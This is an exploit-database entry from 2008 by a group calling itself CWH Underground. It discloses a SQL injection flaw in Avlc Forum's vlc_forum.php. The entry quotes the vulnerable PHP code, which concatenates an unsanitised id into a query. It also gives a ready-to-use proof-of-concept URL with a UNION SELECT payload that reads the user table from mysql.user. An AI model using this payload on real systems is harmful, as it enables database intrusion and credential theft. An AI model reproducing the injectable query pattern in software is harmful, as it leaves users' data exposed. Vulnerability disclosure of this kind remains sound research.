Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

2008-07-12T00:00:00
ID 1337DAY-ID-3394
Type zdt
Reporter CWH Underground
Modified 2008-07-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
================================================================



  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 12 July 2008


#####################################################
 APPLICATION : Avlc Forum
 VERSION     : N/A
 VENDOR	     : N/A
#####################################################

-- Remote SQL Injection ---

---------------------------------
 Vulnerable File [vlc_forum.php]
---------------------------------

@Line

   141:  $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
   142:  $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());


-------------
 POC Exploit
-------------

[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--



#  0day.today [2018-01-04]  #